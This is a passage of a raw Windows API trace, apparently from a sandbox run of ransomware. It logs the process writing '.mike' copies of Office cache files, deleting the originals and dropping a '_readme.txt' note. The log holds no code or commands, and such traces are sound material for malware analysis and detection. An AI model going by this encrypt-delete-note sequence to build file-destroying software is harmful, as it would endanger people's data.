nFileSizeLow=0x7c4)) returned 1 [0040.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.720] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.720] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2178bbc | out: lpFileInformation=0x2178bbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4)) returned 1 [0040.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.720] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.720] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.720] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.720] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.720] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.720] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.720] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.721] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.721] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.721] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.721] GetFileType (hFile=0x264) returned 0x1 [0040.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.721] GetFileType (hFile=0x264) returned 0x1 [0040.721] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.721] WriteFile (in: hFile=0x264, lpBuffer=0x2179a38*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2179a38*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.722] CloseHandle (hObject=0x264) returned 1 [0040.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.722] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2179540 | out: lpFileInformation=0x2179540*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4)) returned 1 [0040.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.722] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.723] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.723] GetFileType (hFile=0x264) returned 0x1 [0040.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.723] GetFileType (hFile=0x264) returned 0x1 [0040.723] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.723] ReadFile (in: hFile=0x264, lpBuffer=0x217ab60, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x217ab60*, lpNumberOfBytesRead=0x2af110*=0x7c4, lpOverlapped=0x0) returned 1 [0040.724] CloseHandle (hObject=0x264) returned 1 [0040.725] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.725] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.725] GetFileType (hFile=0x264) returned 0x1 [0040.725] GetFileType (hFile=0x264) returned 0x1 [0040.725] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.725] WriteFile (in: hFile=0x264, lpBuffer=0x21808cc*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21808cc*, lpNumberOfBytesWritten=0x2af104*=0x7d0, lpOverlapped=0x0) returned 1 [0040.725] CloseHandle (hObject=0x264) returned 1 [0040.726] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.726] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.727] GetFileType (hFile=0x264) returned 0x1 [0040.727] GetFileType (hFile=0x264) returned 0x1 [0040.728] WriteFile (in: hFile=0x264, lpBuffer=0x2183af4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x2183af4*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.728] CloseHandle (hObject=0x264) returned 1 [0040.728] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.728] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.728] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe27a64c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe27a64c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe27a64c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x9f0)) returned 1 [0040.729] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.729] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.729] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2185270 | out: lpFileInformation=0x2185270*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe27a64c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe27a64c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe27a64c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x9f0)) returned 1 [0040.729] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.729] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0040.729] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.729] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0040.730] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.730] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.730] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.730] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.730] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.731] GetFileType (hFile=0x264) returned 0x1 [0040.731] GetFileType (hFile=0x264) returned 0x1 [0040.731] WriteFile (in: hFile=0x264, lpBuffer=0x2186f54*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x2186f54*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.732] CloseHandle (hObject=0x264) returned 1 [0040.732] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.732] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.732] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe27a64c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe27a64c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.733] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe27a64c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe27a64c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.733] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0040.733] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2780360, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2780360, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2780360, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x870, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNoteMUI.xml.mike", cAlternateFileName="ONENOT~1.MIK")) returned 1 [0040.733] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36db9d00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x36db9d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5e95540, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10a5df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OnoteLR.cab", cAlternateFileName="")) returned 1 [0040.733] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe27a64c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe27a64c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe27a64c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x9f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0040.733] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2780360, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2780360, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe27a64c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0040.734] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2780360, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2780360, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe27a64c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0040.734] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.734] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.734] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0040.747] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0040.747] CoTaskMemFree (pv=0x4fe370) [0040.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0040.747] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.747] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.747] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.747] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.816] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.816] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0040.817] FindNextFileW 